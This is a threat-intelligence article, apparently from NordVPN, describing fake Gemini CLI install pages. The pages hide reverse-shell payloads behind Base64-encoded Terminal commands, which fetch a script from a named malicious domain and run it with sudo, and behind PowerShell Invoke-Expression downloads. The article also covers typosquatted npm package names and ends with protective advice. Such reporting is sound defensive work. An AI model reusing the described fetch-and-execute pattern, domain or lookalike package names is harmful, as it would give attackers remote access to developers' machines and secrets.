Fake Gemini CLI scams: Hackers are using AI hype to target developers’ devices

What did the researchers find?

Researchers identified several active campaigns exploiting the growing popularity of AI developer tools. During the investigation, they uncovered three separate but related operations built around the Gemini CLI brand:

• Fake Gemini CLI websites targeting macOS users
• Malicious PowerShell installers targeting Windows users
• Typosquatting attempts involving fake npm packages

The attacks targeted both macOS and Windows users through fake websites, cloned repositories, and deceptive posts shared on forums and social media communities. These pages and messages were designed to look convincing enough for users to copy, paste, and run the malicious commands themselves.

The malware delivered through these campaigns was identified as a reverse shell. Instead of simply infecting the device, a reverse shell connects the victim’s machine directly to the attacker, giving them remote access to infected devices. Once active, the malware allowed attackers to execute commands, steal data, install additional payloads, and maintain persistent access to the infected device.

How the fake Gemini CLI campaigns work

While the delivery methods varied between macOS and Windows, each campaign started with the same trick — a convincing fake Gemini CLI setup page or installation guide that pushed users to run malicious commands. Below, we break down how the attacks unfolded on each platform.

Campaign 1: Fake Gemini CLI websites targeting macOS users

In the macOS campaign, attackers created fake Gemini CLI websites that closely resembled the official setup page. Users visiting the site saw what looked like normal installation instructions and a command they were told to run in Terminal.

The command was Base64 encoded, meaning the attackers hid the real command inside scrambled-looking text to make it less suspicious at first glance. Once decoded, it connected to the malicious domain “6zo.my,” downloaded a PHP script called “serve.php,” and executed it with administrator privileges using “sudo bash.”

Because the script ran with elevated permissions, the malware gained broad access to the system immediately after execution.

Campaign 2: Malicious PowerShell installers targeting Windows users

The Windows campaign used a similar idea, but instead of Terminal, attackers used a PowerShell command disguised as part of a legitimate Gemini CLI installation process. Attackers filled the script with harmless-looking variable names such as “$Install='GeminiCLI’” and fake version information to make it appear authentic.

In reality, the command connected to a malicious server, downloaded malware, and executed it directly in the device’s memory using “Invoke-Expression.” This fileless execution method makes detection more difficult because the malware does not rely on a traditional executable file stored on the device. Instead, the malicious code runs directly in memory, which helps it evade older antivirus tools that mainly scan files saved on disk.

Campaign 3: Typosquatting attempts involving fake npm packages

Researchers also uncovered attempts to abuse the npm ecosystem through typosquatting. Attackers created fake package names such as “gemini-cli” and “gemini/cli,” which closely resembled the legitimate package “@google/gemini-cli.”

The campaign relied on a common developer habit — skipping the organization name when searching for or installing packages. Someone typing quickly could easily mistake the fake package for the real one.

At the time of analysis, the fake packages had not yet appeared in the public npm registry. However, the preparation itself pointed to an active and potentially imminent threat.

What happens after execution?

Once the malicious payload runs, the attacker gains unrestricted remote access to the victim’s machine.

Researchers found that the malware establishes a reverse shell connection between the compromised device and the attacker’s server. That connection allows attackers to interact with the victim’s computer remotely as if they were physically sitting in front of it.

This level of access allows attackers to:

• steal files and credentials.
• install additional malware.
• monitor user activity.
• execute arbitrary commands.
• maintain long-term persistence on the system.

For developers, the risks can become even more serious. A compromised machine may contain source code, SSH keys, API tokens, internal documentation, or access to company infrastructure. In a corporate environment, attackers may also use the infected device as a pivot point to move deeper into internal networks and connected systems.

Why are these campaigns so effective?

These attacks work because they blend into normal developer behavior. Developers constantly install tools, copy commands from documentation, and test new software. Attackers understand that a familiar-looking install page or Terminal command can lower suspicion, especially when the tool involves a popular AI platform generating massive attention online.

The campaigns also rely on technical tricks designed to avoid quick detection. Base64 encoding hides the real purpose of commands from users, while fileless PowerShell execution helps malware bypass traditional antivirus software. The fake npm packages exploit small naming differences that are easy to miss during a fast install.

In many cases, the victim unknowingly performs every step of the attack themselves.

How to recognize these and protect yourself

As AI tools become more popular, verifying what you install becomes just as important as what you build with it. Developers should treat install commands with the same caution as downloaded files or email attachments:

• Use official vendor repositories and documentation. Be skeptical of websites, forum posts, or social media messages offering unofficial, beta, or early-access versions of popular AI tools.
• Verify the full package name. For Gemini CLI, the only legitimate package is “@google/gemini-cli.”
• Avoid blindly copying commands into Terminal or PowerShell. Inspect encoded or overly complex commands before running them. Commands that contain long encoded strings, hidden variables, or instructions that immediately download and execute remote content should raise red flags. PowerShell commands using “Invoke-Expression” also deserve extra scrutiny because attackers commonly use them in fileless malware attacks.
• Use real-time threat protection. Security tools with behavioral detection can also help identify suspicious activity that traditional file-based antivirus tools may miss. NordVPN’s Threat Protection Pro™ can help block malicious domains and dangerous downloads before they compromise a device.

Methodology 

The NordVPN Threat Intelligence team analyzed multiple campaigns impersonating Gemini CLI across macOS and Windows environments. Researchers examined phishing websites, cloned setup pages, encoded Terminal commands, PowerShell payloads, malicious domains, and typosquatting attempts targeting the npm ecosystem. All findings were cross-checked through technical analysis to distinguish actively malicious infrastructure from unrelated or lookalike resources.